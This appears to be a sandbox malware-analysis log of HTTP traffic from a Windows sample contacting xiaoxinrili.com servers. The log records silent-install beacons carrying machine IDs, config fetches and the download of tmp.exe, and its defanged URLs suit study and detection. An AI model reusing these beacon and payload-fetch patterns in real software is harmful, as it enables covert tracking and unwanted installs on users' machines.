Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:45 GMT
1..1..0......
GET /city HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:46 GMT
1..1..0......
GET /city HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:46 GMT
1..1..0..
GET /core.php?web_id=5467330&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:38 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:38 GMT
Expires: Wed, 14 Jan 2015 11:52:38 GMT
Age: 818
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:38 GMT
X-Swift-CacheTime: 900
Via: cache4.de1[0,200-0,H], cache5.de1[1,0]
!function(){var p,q,r,a=encodeURIComponent,b="5467330",c="",d="",e="online_v3.php",f="hzs23.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET /core.php?web_id=30085361&l=3&t=q HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 750
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:40 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:40 GMT
Expires: Wed, 14 Jan 2015 11:52:40 GMT
Age: 816
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:40 GMT
X-Swift-CacheTime: 900
Via: cache1.de1[0,200-0,H], cache5.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="30085361",c="3",d="",e="online_v3.php",f="q5.cnzz.com",g="1",h="text",i="q",j="全景统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET /core.php?web_id=5554906&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:54 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:54 GMT
Expires: Wed, 14 Jan 2015 11:52:54 GMT
Age: 812
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:54 GMT
X-Swift-CacheTime: 900
Via: cache1.de1[0,200-0,H], cache5.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="5554906",c="",d="",e="online_v3.php",f="hzs14.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu 3d02aa32ed472b1d9368b0a1d258b1a7
Expires: Wed, 14 Jan 2015 11:51:19 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xe4a43e4c0000c927
BDUSERID: 0
<<< skipped >>>
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 8283a456f4f2fcbe7d033a319ebdf652
Expires: Wed, 14 Jan 2015 11:51:13 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xf3ae7d2f0000d9ed
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
<<< skipped >>>
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 1a71cd95de14792ccc45de0b785c53dc
Expires: Wed, 14 Jan 2015 11:50:53 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xd6212c900000d9aa
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
<<< skipped >>>
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 082df6cf533022a4274251c69fa2738d
Expires: Wed, 14 Jan 2015 11:50:52 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xb6b4c2b20000cfbf
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
<<< skipped >>>
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 7b032a5b300d7008530b99d911ef79b0
Expires: Wed, 14 Jan 2015 11:51:18 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xd16108b60000ef4e
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
<<< skipped >>>
GET /stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hqs5.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:23 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Cache-Control: no-cache
Connection: Keep-Alive
Host: fw1.dl.wdjcdn.com
HTTP/1.1 206 Partial Content
Date: Wed, 14 Jan 2015 11:51:37 GMT
Expires: Fri, 13 Feb 2015 11:51:37 GMT
Content-Length: 3383964
Content-Range: bytes 0-3383963/3383964
Content-Type: application/zip
Last-Modified: Thu, 16 Jan 2014 03:30:19 GMT
Cache-Control: max-age=2592000
Connection: Keep-Alive
Server: Tengine/1.4.6
Accept-Ranges: bytes
Fw-Via: DISK HIT from ctl-ha-091-042.fcd, DISK HIT from CTL_JS_002_039.fcd, DISK HIT from CTL_ZJ_146_221.fcd, DISK HIT from CTL_JS_002_040.fcd
<<< skipped >>>
GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=adslist&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.0
Host: count.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly
Cache-Control: private, must-revalidate
Date: Wed, 14 Jan 2015 11:49:45 GMT
pragma: no-cache
expires: -1
0..
GET /stat.php?id=5614889 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s9.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:11:31 GMT
Last-Modified: Wed, 14 Jan 2015 11:11:31 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2424
X-Cache: HIT TCP_MEM_HIT dirn:6:786858085
X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:32 GMT
X-Swift-CacheTime: 5399
Via: cache1.de1[0,200-0,H], cache8.de1[0,0]
<<< skipped >>>
GET /stat.php?id=5467330&web_id=5467330 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s23.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 10:54:50 GMT
Last-Modified: Wed, 14 Jan 2015 10:54:50 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 3386
X-Cache: HIT TCP_MEM_HIT dirn:0:415567230
X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:50 GMT
X-Swift-CacheTime: 5400
Via: cache8.de1[0,200-0,H], cache7.de1[0,0]
<<< skipped >>>
GET /appImg/appimg.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 20 Mar 2014 02:35:58 GMT
Accept-Ranges: bytes
ETag: "75d4f20e543cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:29 GMT
Content-Length: 0
....
GET /appImg/AppCloud4.2.xml HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Apr 2014 03:16:06 GMT
Accept-Ranges: bytes
ETag: "9bff765da25ecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 2817
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item genre="set" skinurl="" md5="" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="beiwang" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="tixing" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="guanji" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="arder" uitype="ie" name="...." ui_name="yinyue" comline="926,600,0,....,yinyue_rilicla,1,hXXp://update.redshu.com/daohang/xck.html?1,hXXp://fm.baidu.com/?embed=ps&bd_user=3590635477&bd_sig=7ecf52d8702148fffdf014bb7cde9c84&canvas_pos=platform" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />..<item genre="tool" uitype="ie" name="......" ui_name="jisuanqi" comline="555,620,0,......,jisuanqi_rilicla,0,hXXp://update.redshu.com/daohang/xck.html?6,hXXp://apps2.bdimg.com/store/static/kvt/3e9b470e8b9fceaa66d46a935b45518e.swf" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" /> .. <item genre="live" uitype="ie" name="...." ui_name="kuaidi" comline="550,425,0,....,kuaidi_rilicla,0,hXXp://update.redshu.com/daohang/xck.html?2,hXXp://baidu.kuaidi100.com/index2.html?" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="live" uitype="noie_rili" name="...." ui_name="jiaqi" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <
<<< skipped >>>
GET /PopBoxSmall.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Nov 2014 05:36:39 GMT
Accept-Ranges: bytes
ETag: "b64ab2caba3d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 10
1,120,7200....
GET /PopBoxBig.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 12 Jun 2014 07:47:50 GMT
Accept-Ranges: bytes
ETag: "3c8dfd9b1286cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 11
0,300,14400....
GET /update.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Apr 2014 07:28:05 GMT
Accept-Ranges: bytes
ETag: "8b5be4eb7b4dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 34
1|5F0218693884A23493C4D700684C9076
GET /Install.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 24 Sep 2014 05:33:59 GMT
Accept-Ranges: bytes
ETag: "c1a82024b9d7cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:32 GMT
Content-Length: 34
0|71AF22E1A907CAE3F48F41360B58562B
GET /weather.txt HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT
Accept-Ranges: bytes
ETag: "8ee53b69ffcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 38
12154|1b5d950e15ba193e96405dd75be5ab1f
GET /tj.html?%original file name%.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Tue, 26 Aug 2014 06:29:52 GMT
Accept-Ranges: bytes
ETag: "3822fd24f7c0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:37 GMT
Content-Length: 485
<<< skipped >>>
GET /tmp.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 31 Mar 2014 01:38:57 GMT
Accept-Ranges: bytes
ETag: "9a11defb814ccf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:53 GMT
Content-Length: 105984
<<< skipped >>>
GET /FMTFilterinset.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298; CNZZDATA5614889=cnzz_eid=808136781-1421233891-&ntime=1421233891
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 04 Jan 2015 13:34:12 GMT
Accept-Ranges: bytes
ETag: "d09630202328d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:54:01 GMT
Content-Length: 108
setup_zol-a1480.exe,setup_smx1208.exe,setup_smx1226.exe,setup_pp0104.exe,setup_smx0104.exe,setup_zjm0104.exe
GET /startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: count.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:50:15 GMT
1..1..0..
GET /ico/xiangmu2.ico HTTP/1.0
Host: update.redshu.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)
HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Mon, 05 Jan 2015 10:01:09 GMT
Accept-Ranges: bytes
ETag: "14f8a87ce28d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:26 GMT
Connection: keep-alive
Content-Length: 16958
<<< skipped >>>
GET /16246473.js HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1981
